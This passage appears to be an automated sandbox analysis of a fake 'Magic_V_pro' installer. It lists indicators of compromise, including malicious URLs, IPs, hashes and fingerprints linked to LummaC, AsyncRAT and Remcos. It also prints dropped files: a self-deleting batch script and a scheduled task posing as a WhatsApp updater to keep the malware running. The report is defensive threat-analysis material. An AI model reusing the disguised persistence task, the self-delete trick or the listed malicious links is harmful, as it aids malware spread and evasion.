	https://rea.grupolalegion.ec/p.php/1	Get hash	malicious	CAPTCHA Scam ClickFix, LummaC Stealer	Browse
	https://rea.grupolalegion.ec/p.php/1	Get hash	malicious	Unknown	Browse
	https://rea.grupolalegion.ec/p.php	Get hash	malicious	Unknown	Browse
	https://rea.grupolalegion.ec/Viber.exe	Get hash	malicious	Unknown	Browse
	z3oPvgjvyN.exe	Get hash	malicious	LummaC Stealer	Browse
104.18.111.161	vF20HtY4a4.exe	Get hash	malicious	Unknown	Browse	tinyurl.com/bdhpvpny
	VvPrGsGGWH.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	tinyurl.com/muewsc78
	5UIy3bo46y.dll	Get hash	malicious	Unknown	Browse	tinyurl.com/yeykydun
	BeginSync lnk.lnk	Get hash	malicious	Unknown	Browse	tinyurl.com/yeykydun
	SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll	Get hash	malicious	AsyncRAT, XWorm	Browse	tinyurl.com/yk3s8ubp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
tinyurl.com	plugin-newest_release_.exe	Get hash	malicious	Unknown	Browse	104.18.111.161
	plugin-newest_release_.exe	Get hash	malicious	Unknown	Browse	104.17.112.233
	https://tinyurl.com/4f78h9sp	Get hash	malicious	Unknown	Browse	104.17.112.233
	https://gffd-5ru.pages.dev/?email=nobody@wp.pl&mail=wp.pl	Get hash	malicious	HTMLPhisher	Browse	104.18.111.161
	https://www.ijf.org/cookies_agree?backTo=//wehirectrecruitments.com/skip/67f713e63d79655c92b5cc879ab7528bY2xhcmUubmljaG9sc0BkdnNhLmdvdi51aw==67f713e63d79655c92b5cc879ab7528b	Get hash	malicious	HTMLPhisher	Browse	104.18.111.161
	https://tinyurl.com/7kurjbxf#moreinfo@choosewashington.com	Get hash	malicious	HTMLPhisher	Browse	104.18.111.161
	https://tinyurl.com/52atpek7	Get hash	malicious	HTMLPhisher	Browse	104.17.112.233
	https://tinyurl.com/puttyto	Get hash	malicious	CobaltStrike, Metasploit	Browse	104.18.111.161
	8dm2CHOlmZ.ps1	Get hash	malicious	Unknown	Browse	104.17.112.233
	https://forms.office.com/Pages/ShareFormPage.aspx?id=iTARqgAd5UqV7QMdokx8z5JQ4K3tn3VMnOw2L2-4Y1tUQzFZOEUySUhJNFFWWTUxSjFORUVGUVNVNi4u&sharetoken=iZc5orqlj4ABtC30rQXF	Get hash	malicious	HTMLPhisher	Browse	104.18.111.161
rentry.org	plugin-newest_release_.exe	Get hash	malicious	Unknown	Browse	164.132.58.105
	plugin-newest_release_.exe	Get hash	malicious	Unknown	Browse	164.132.58.105
	segura.vbs	Get hash	malicious	Remcos	Browse	164.132.58.105
	asegurar.vbs	Get hash	malicious	Remcos	Browse	164.132.58.105
	XS_Trade_AI-newest_release_.exe	Get hash	malicious	LummaC	Browse	164.132.58.105
	sims-4-updater-v1.3.4.exe	Get hash	malicious	Unknown	Browse	164.132.58.105
	RedEngine.exe	Get hash	malicious	Babadeda, RedLine	Browse	164.132.58.105
	AtlasLoader.exe	Get hash	malicious	Unknown	Browse	198.251.88.130
	AtlasLoader.exe	Get hash	malicious	Unknown	Browse	198.251.88.130
	LX.exe	Get hash	malicious	Unknown	Browse	198.251.88.130
rea.grupolalegion.ec	https://rea.grupolalegion.ec/p.php/1	Get hash	malicious	CAPTCHA Scam ClickFix, LummaC Stealer	Browse	190.92.154.206
	https://rea.grupolalegion.ec/p.php	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	190.92.154.206
	https://rea.grupolalegion.ec/p.php	Get hash	malicious	Unknown	Browse	190.92.154.206
	https://rea.grupolalegion.ec/p.php/1	Get hash	malicious	CAPTCHA Scam ClickFix, LummaC Stealer	Browse	190.92.154.206
	https://rea.grupolalegion.ec/p.php/1	Get hash	malicious	Unknown	Browse	190.92.154.206
	https://rea.grupolalegion.ec/p.php	Get hash	malicious	Unknown	Browse	190.92.154.206
	https://rea.grupolalegion.ec/Viber.exe	Get hash	malicious	Unknown	Browse	190.92.154.206
	z3oPvgjvyN.exe	Get hash	malicious	LummaC Stealer	Browse	190.92.154.206

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	1.exe	Get hash	malicious	Unknown	Browse	172.67.135.71
	1.exe	Get hash	malicious	Unknown	Browse	104.21.80.136
	VirtManage.exe	Get hash	malicious	Unknown	Browse	104.21.62.135
	VirtManage.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	VirtManage.exe	Get hash	malicious	Unknown	Browse	104.21.62.135
	VirtManage.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://www.criminon.org/	Get hash	malicious	Unknown	Browse	104.16.123.96
	PalEak0Yh6.exe	Get hash	malicious	RedLine	Browse	172.67.75.172
	http://signaturerequestdocumentsmarch.sombrainfinita.de/uN7hn	Get hash	malicious	Unknown	Browse	104.21.112.1
	https://eztxt.net/Iv7CmP#bW9uaWNhX2NvbGJhdGhAZmQub3Jn	Get hash	malicious	Unknown	Browse	188.114.96.3
OVHFR	https://www.dottedsign.com/task?code=eyJhbGciOiJIUzUxMiJ9.eyJ0YXNrX2lkIjozNDU1ODM1LCJmaWxlX2lkIjoyMjU3NDQ4Mywic2lnbl9maWxlX2lkIjoyMzE3NTY1OCwic3RhZ2VfaWQiOjQ3MjQ2MTcsImVtYWlsIjoidmZhcmlhc0B3ZXN0bGFrZS5jb20iLCJleHBpcmVkX2F0IjoxNzQxNTUzNDgzfQ.HzZLgMMxAZSV_iVgO--XdcSNVOvVCdiCg8S3aUWMChplsdtgyqOWKyJi3vwVbeBh99sm9EHWsNwj41IZdYNjWA	Get hash	malicious	Unknown	Browse	51.77.64.70
	NEW PURCHASE ORDER.exe	Get hash	malicious	FormBook	Browse	51.222.255.207
	FuYyhSE7Nh.exe	Get hash	malicious	Unknown	Browse	94.23.158.211
	FuYyhSE7Nh.exe	Get hash	malicious	Unknown	Browse	94.23.158.211
	plugin-newest_release_.exe	Get hash	malicious	Unknown	Browse	164.132.58.105
	plugin-newest_release_.exe	Get hash	malicious	Unknown	Browse	164.132.58.105
	Halkbank Ekstre.bat.exe	Get hash	malicious	Remcos	Browse	51.81.149.203
	Update.Client.exe	Get hash	malicious	ScreenConnect Tool	Browse	51.79.171.167
	Update.Client.exe	Get hash	malicious	ScreenConnect Tool	Browse	51.79.171.167
	oCPGyn28rc.exe	Get hash	malicious	AgentTesla	Browse	144.217.198.22
DesarrollosDigitalesdePulsarConsultingAR	mpsl.elf	Get hash	malicious	Unknown	Browse	200.69.26.158
	https://rea.grupolalegion.ec/p.php/1	Get hash	malicious	CAPTCHA Scam ClickFix, LummaC Stealer	Browse	190.92.154.206
	https://rea.grupolalegion.ec/p.php	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	190.92.154.206
	https://rea.grupolalegion.ec/p.php	Get hash	malicious	Unknown	Browse	190.92.154.206
	https://rea.grupolalegion.ec/p.php/1	Get hash	malicious	CAPTCHA Scam ClickFix, LummaC Stealer	Browse	190.92.154.206
	https://rea.grupolalegion.ec/p.php/1	Get hash	malicious	Unknown	Browse	190.92.154.206
	https://rea.grupolalegion.ec/p.php	Get hash	malicious	Unknown	Browse	190.92.154.206
	aV2ffcSuKl.exe	Get hash	malicious	Amadey, GCleaner, LummaC Stealer, PureLog Stealer, Stealc, SystemBC, Vidar	Browse	200.69.22.4
CLOUDFLARENETUS	1.exe	Get hash	malicious	Unknown	Browse	172.67.135.71
	1.exe	Get hash	malicious	Unknown	Browse	104.21.80.136
	VirtManage.exe	Get hash	malicious	Unknown	Browse	104.21.62.135
	VirtManage.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	VirtManage.exe	Get hash	malicious	Unknown	Browse	104.21.62.135
	VirtManage.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://www.criminon.org/	Get hash	malicious	Unknown	Browse	104.16.123.96
	PalEak0Yh6.exe	Get hash	malicious	RedLine	Browse	172.67.75.172
	http://signaturerequestdocumentsmarch.sombrainfinita.de/uN7hn	Get hash	malicious	Unknown	Browse	104.21.112.1
	https://eztxt.net/Iv7CmP#bW9uaWNhX2NvbGJhdGhAZmQub3Jn	Get hash	malicious	Unknown	Browse	188.114.96.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	RFQ-JC25-#595837.xlsx	Get hash	malicious	Unknown	Browse	164.132.58.105 104.18.111.161 172.67.194.165
	DQBok03QL1.exe	Get hash	malicious	LummaC Stealer	Browse	164.132.58.105 104.18.111.161 172.67.194.165
	ORLVDnEcC3.exe	Get hash	malicious	LummaC Stealer	Browse	164.132.58.105 104.18.111.161 172.67.194.165
	kS9YOZjwfn.exe	Get hash	malicious	LummaC Stealer	Browse	164.132.58.105 104.18.111.161 172.67.194.165
	rakf6nyw06.exe	Get hash	malicious	LummaC Stealer	Browse	164.132.58.105 104.18.111.161 172.67.194.165
	0V0Q7kWH0N.exe	Get hash	malicious	LummaC Stealer	Browse	164.132.58.105 104.18.111.161 172.67.194.165
	KMSpico.exe	Get hash	malicious	LummaC Stealer	Browse	164.132.58.105 104.18.111.161 172.67.194.165
	KMSpico.exe	Get hash	malicious	LummaC Stealer	Browse	164.132.58.105 104.18.111.161 172.67.194.165
	plugin-newest_release_.exe	Get hash	malicious	Unknown	Browse	164.132.58.105 104.18.111.161 172.67.194.165
	plugin-newest_release_.exe	Get hash	malicious	Unknown	Browse	164.132.58.105 104.18.111.161 172.67.194.165
37f463bf4616ecd445d4a1937da06e19	1.exe	Get hash	malicious	Unknown	Browse	190.92.154.206
	1.exe	Get hash	malicious	Unknown	Browse	190.92.154.206
	BWllpq4Tel.exe	Get hash	malicious	GuLoader	Browse	190.92.154.206
	uK5pfobYyD.exe	Get hash	malicious	DarkCloud	Browse	190.92.154.206
	MNLS4PjscF.exe	Get hash	malicious	GuLoader	Browse	190.92.154.206
	MNLS4PjscF.exe	Get hash	malicious	GuLoader	Browse	190.92.154.206
	OW1i3n5K3s.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	190.92.154.206
	GBYfjUz4a5.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	190.92.154.206
	g44YQtTyjN.exe	Get hash	malicious	DarkCloud	Browse	190.92.154.206
	BtCQu5APhK.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	190.92.154.206

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\is-QC304.tmp\_isetup\_setup64.tmp	SecuriteInfo.com.Program.Unwanted.5412.9015.527.exe	Get hash	malicious	PureLog Stealer	Browse
	SecuriteInfo.com.Program.Unwanted.5412.9015.527.exe	Get hash	malicious	PureLog Stealer	Browse
	guge.exe	Get hash	malicious	MicroClip	Browse
	google#U5b89#U88c5 .exe	Get hash	malicious	MicroClip	Browse
	guge_windows_v7.98.79_Setup.zip.exe	Get hash	malicious	MicroClip	Browse
	KMSpico.exe	Get hash	malicious	LummaC Stealer	Browse
	AppKMSPico.exe	Get hash	malicious	RHADAMANTHYS	Browse
	AppKMSPico.exe	Get hash	malicious	RHADAMANTHYS	Browse
	KMSpico.exe	Get hash	malicious	LummaC Stealer	Browse
	plugin-newest_release_.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Programs\Common\willrandom.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1427456
Entropy (8bit):	7.142790634598866
Encrypted:	false
SSDEEP:	24576:jyRjE+yRYwp3ufMx1FxH98F5iULtFx3qMGRm5UJWoHI7vaBvJD6WYc9Z:jyG+8tVYiULtL3XG3uvSJD6lc9Z
MD5:	33645B3AFD79ED29F7E6F476D7F6ED4B
SHA1:	D49C57882892F2B600CA440A3E05B7209560A9D0
SHA-256:	0796140E4F63122408C2D2D536F5C12BD68D8AF54437E767225FE6B88CE61BC5
SHA-512:	F935A4F6B507D2F63519EDE5B3EC52EF629FEEE8FD5ECF402D6F1368829BA0792A45DE3C9ACC1BDC19D352951A747F900CEDB7376EAC775DE3D8EE5EAAC4A123
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 67%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................t........@....@..........................P...................@...............................&... .......................@..T............................0......................................................CODE.....'.......(.................. ..`DATA.........@.......,..............@...BSS......................................idata...&.......(..................@....tls......... ...........................rdata.......0......................@..P.reloc..T....@......................@..P.rsrc........ ......................@..Ppb...........0......................@...........................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

Download File

Process:	C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2541056
Entropy (8bit):	6.38139342357515
Encrypted:	false
SSDEEP:	49152:Yg2qPtc1e5OS7bPGoUl+x/grN4azvchYk2HAT:YvqPCnrN4azvSYPU
MD5:	6C66FDD38C098F271FDE6E9E74DBD0EB
SHA1:	27FBE48E15EDCBE0F216C9D0CFAA242DCED5D71C
SHA-256:	253ABB0DA942F3CE4FB839624077180BDAE8109E82518E6442259A667900DB6F
SHA-512:	031642B8B219CC46208CDC18107C54BB080C44F0877971D47A052268D9571E67F7F7C786C17F1F78561F976D4BF86F7F9A74453B6B0C9592164CF4299033C540
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....]..................$...........$.......$...@...........................'...........@......@....................&.......%..5...@&..X...................................................0&.....................D.%.@.....&......................text...8.$.......$................. ..`.itext...&....$..(....$............. ..`.data...DZ....$..\....$.............@....bss.....q...@%..........................idata...5....%..6...(%.............@....didata.......&......^%.............@....edata........&......h%.............@..@.tls....D.... &..........................rdata..]....0&......j%.............@..@.rsrc....X...@&..Z...l%.............@..@..............'.......&.............@..@........................................................

C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

Download File

Process:	C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2541056
Entropy (8bit):	6.38139342357515
Encrypted:	false
SSDEEP:	49152:Yg2qPtc1e5OS7bPGoUl+x/grN4azvchYk2HAT:YvqPCnrN4azvSYPU
MD5:	6C66FDD38C098F271FDE6E9E74DBD0EB
SHA1:	27FBE48E15EDCBE0F216C9D0CFAA242DCED5D71C
SHA-256:	253ABB0DA942F3CE4FB839624077180BDAE8109E82518E6442259A667900DB6F
SHA-512:	031642B8B219CC46208CDC18107C54BB080C44F0877971D47A052268D9571E67F7F7C786C17F1F78561F976D4BF86F7F9A74453B6B0C9592164CF4299033C540
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....]..................$...........$.......$...@...........................'...........@......@....................&.......%..5...@&..X...................................................0&.....................D.%.@.....&......................text...8.$.......$................. ..`.itext...&....$..(....$............. ..`.data...DZ....$..\....$.............@....bss.....q...@%..........................idata...5....%..6...(%.............@....didata.......&......^%.............@....edata........&......h%.............@..@.tls....D.... &..........................rdata..]....0&......j%.............@..@.rsrc....X...@&..Z...l%.............@..@..............'.......&.............@..@........................................................

C:\Users\user\AppData\Local\Temp\is-QC304.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: SecuriteInfo.com.Program.Unwanted.5412.9015.527.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Program.Unwanted.5412.9015.527.exe, Detection: malicious, Browse Filename: guge.exe, Detection: malicious, Browse Filename: google#U5b89#U88c5 .exe, Detection: malicious, Browse Filename: guge_windows_v7.98.79_Setup.zip.exe, Detection: malicious, Browse Filename: KMSpico.exe, Detection: malicious, Browse Filename: AppKMSPico.exe, Detection: malicious, Browse Filename: AppKMSPico.exe, Detection: malicious, Browse Filename: KMSpico.exe, Detection: malicious, Browse Filename: plugin-newest_release_.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-QC304.tmp\idp.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	237568
Entropy (8bit):	6.42067568634536
Encrypted:	false
SSDEEP:	3072:dnSx3lws+iWbUmJmE8dxMw7r+mjT5PbzEFwyGIyTcHY10tSB9j:IP0bUmQEUr+mRcbTx4N
MD5:	55C310C0319260D798757557AB3BF636
SHA1:	0892EB7ED31D8BB20A56C6835990749011A2D8DE
SHA-256:	54E7E0AD32A22B775131A6288F083ED3286A9A436941377FC20F85DD9AD983ED
SHA-512:	E0082109737097658677D7963CBF28D412DCA3FA8F5812C2567E53849336CE45EBAE2C0430DF74BFE16C0F3EEBB46961BC1A10F32CA7947692A900162128AE57
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)Wj.H99.H99.H99..D9.H99..W9.H99..T9-H99zGd9.H99.H894H99..K9.H99..C9.H99..E9.H99..A9.H99Rich.H99........................PE..L......W...........!................Nr..............................................0............................... ;......h/..d.......................................................................@............................................text...i........................... ..`.rdata...n.......p..................@..@.data....:...@... ...@..............@....rsrc................`..............@..@.reloc..b-.......0...p..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp
File Type:	ASCII text
Category:	dropped
Size (bytes):	193
Entropy (8bit):	4.536947302398739
Encrypted:	false
SSDEEP:	6:YHNwvorYoK9AcEu4sXj0wvorYoK9AcEu4sXjjK/sn:K+w8XusXj3w8XusXj2/sn
MD5:	51EDFFA18B8D028241EA809E609B0B74
SHA1:	F3C69EB23E10EB3F00363E17E1F60973FC00998A
SHA-256:	70E4C2790B106189BAA4C38DC3A9FE17975D1E667425B0D97DA2F9CAB24D560A
SHA-512:	2CFFDB56D09311D079916E4EC61360A5A48041E65C4DADC315F14C88E1665FA608ADABA7E5536A99E278E9570571EA7BE8B46C4114FA18734CBA4C44FCE438F4
Malicious:	false
Preview:	:ol.del C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe.if exist C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe goto ol.del %0

C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	237568
Entropy (8bit):	6.42067568634536
Encrypted:	false
SSDEEP:	3072:dnSx3lws+iWbUmJmE8dxMw7r+mjT5PbzEFwyGIyTcHY10tSB9j:IP0bUmQEUr+mRcbTx4N
MD5:	55C310C0319260D798757557AB3BF636
SHA1:	0892EB7ED31D8BB20A56C6835990749011A2D8DE
SHA-256:	54E7E0AD32A22B775131A6288F083ED3286A9A436941377FC20F85DD9AD983ED
SHA-512:	E0082109737097658677D7963CBF28D412DCA3FA8F5812C2567E53849336CE45EBAE2C0430DF74BFE16C0F3EEBB46961BC1A10F32CA7947692A900162128AE57
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)Wj.H99.H99.H99..D9.H99..W9.H99..T9-H99zGd9.H99.H894H99..K9.H99..C9.H99..E9.H99..A9.H99Rich.H99........................PE..L......W...........!................Nr..............................................0............................... ;......h/..d.......................................................................@............................................text...i........................... ..`.rdata...n.......p..................@..@.data....:...@... ...@..............@....rsrc................`..............@..@.reloc..b-.......0...p..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	847360
Entropy (8bit):	6.655399003035542
Encrypted:	false
SSDEEP:	24576:N5Oh3oXwjoThmYgKmRCcBcIGvymfIRNM9+1nG0:Ng9ogjoVsRlBAPV+40
MD5:	6482EE0F372469D1190C74BD70D76153
SHA1:	9001213D28E5B0B18AA24114A38A1EFE1A767698
SHA-256:	4B7FC7818F3168945DBEDADCFD7AAF470B88543EF6B685619AD1C942AC3B1DED
SHA-512:	6A5C2BDF58CD8DEADF51302D8F8B17A14908809EF700A1E366E7D107B1E22ABE8CAF1F68E7EB9D35E9B519793699C3492323F6577C3569A56AC3C845516625F3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........................r...........................l...r..........1....<............#'....i......6.....Rich..........................PE..L...0DCf.............................U............@.......................................@..................................j..x....`.......................p..0g......................................................P............................text............................... ..`.rdata...g.......h..................@..@.data................f..............@....sxdata......P.......n..............@....rsrc........`.......p..............@..@.reloc...u...p...v...x..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp
File Type:	XML 1.0 document, ASCII text, with very long lines (346)
Category:	dropped
Size (bytes):	1995
Entropy (8bit):	4.9796258677616265
Encrypted:	false
SSDEEP:	48:cghUsneYWM1q8YuFdOFQO033ODOiQdKrZLRY4v:Hh3t1bYuFdOFQOMdKrZLv
MD5:	66DE708C5BDDF15322A95F29747A94C8
SHA1:	48836F6D40DDC8B1A39704EA447514C4B31CF010
SHA-256:	77020648C6B89E1ECE72DBA36770C99DF2FAF22720B48954F779D6E97D3C1F7C
SHA-512:	52A61E84CEE3F5746C6F283D112BE9F5540D1C93A5BCA219CB4CD19CE95AF0D102CC6C94DC1129F50634CAB87522DE6CFD674C9B94E70BD97E35A0CA7130B4D0
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Description>Keeps your WhatsApp Desktop application synchronized with essential updates and system improvements. Disabling this task could lead to missed security patches and performance optimizations, potentially impacting WhatsApp Desktop stability. This task will uninstall itself if WhatsApp Desktop no longer relies on it.</Description>. </RegistrationInfo>. <Triggers>. <TimeTrigger>. <Repetition>. <Interval>PT5M</Interval>. <Duration>PT9M</Duration>. <StopAtDurationEnd>true</StopAtDurationEnd>. </Repetition>. <StartBoundary>2025-03-07T21:15:37</StartBoundary>. <Enabled>true</Enabled>. </TimeTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>.

C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\logs

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	872079
Entropy (8bit):	7.999807731924545
Encrypted:	true
SSDEEP:	24576:1iogHB5rPWDwQ76O6+UTmIlEEEqf4odxz84j60baO:0B57uD6DKIS+4od5j6s3
MD5:	A00434CD4070751DB9FEA5D285239290
SHA1:	A3E17391476A50D36B333D1628307B9B39E46CE4
SHA-256:	E4480CC6CF5996E19F86B8A453EF18B69BC81B2246FC7B72E6A5CBA3E8294EC2
SHA-512:	F749C479F89FF63789F37D17E52B11A497D7F8261CBA085694733F2B9418A84CB832E8C81E28780C343FAF4148B65996952C785E20997DD1CABEDDFC279894C3
Malicious:	false
Preview:	PK........5.YZ\..#.M..........willrandom.exe.%.B.\.vg..........K.".f..M..../.~[..d=.z@.<...J&....1.%q?Q=A...bY.<)........F..Ki{.;Si.....xd..\|[...0&_..?.].c.&aZ.R;.....^-..^.....K.......9....T=...0$.p....;]..v..,.6...F....".}[nq..TT .$...5B......).@&:Is.vQ...h5..WP..6..).O_.$K...C.x?0.i....u3C.6C.c(`...E.Q.A...`C.G1.4."..f.9.Y....:h.RMTs.<.`...g.....\|.g..~..,..l..!....X&..wg..L.qU....}....%W.%.9....b.2g8....ds.^h..Y.E...................L..5.L...!j.....[....).C}...48.4......&.....a]..{...c..a4..}X...@..&.Zu.&.cu......SO.d?......_dz.....m....ab...kzv...M+I..g9...v.b..\|...E....^0....+..n..l{....,z...wCtr.N...6.=.5...9.i%.(......j..[....u.4..".U....{.& aK.y.34.2.[.>M....J.n8.2jJ.8.C..;.vC...lW..U. ......,.)...3nY.]..]-Q!B../!.}.vG[b..........(.;.x.;..G.+.........u./..?E.B..Ed.qX2..YP.V.7.%+.I..nk.....4b............qGX/.\|._..C.Z.........}d. ..q}.......W.0.u....=Dyb......=...u......:..k..U@m>.u..'...Rh/.x..T.....Y..E.U.t*...1.....>.+...

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	508
Entropy (8bit):	5.0513362940619775
Encrypted:	false
SSDEEP:	6:AMpnOMvotkMylHcAxXF2Saiewkn23fzIsEBWrlST3wkn23fzIsCv1Aiewkn23fz0:pt6wnRwsfT4TAfCqYfebeQJA1tNoVtv
MD5:	C574476CB7F806938DDA7E9F3D20A282
SHA1:	6499859081EE693C14957A6DC8D8F6B14B1FD77C
SHA-256:	6A2383C095E5554E5B32EA6F4682B8C302234E2D05ADD6FD070A186D6438604F
SHA-512:	934F67163D144380D3D039451BF67B6318CD24E4BE77742A96727C6B4640E6597D3BA85BDBC40B03B17C3AA08C9B7CB2DB03E4D68504BF01A15D2E4BDB8777E0
Malicious:	false
Preview:	..7-Zip (a) 24.05 (x86) : Copyright (c) 1999-2024 Igor Pavlov : 2024-05-14....Scanning the drive for archives:.. 0M Scan C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\. .1 file, 872079 bytes (852 KiB)....Extracting archive: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\logs..--..Path = C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\logs..Type = zip..Physical Size = 872079.... 0%. .Everything is Ok....Size: 1427456..Compressed: 872079..

Static File Info

General

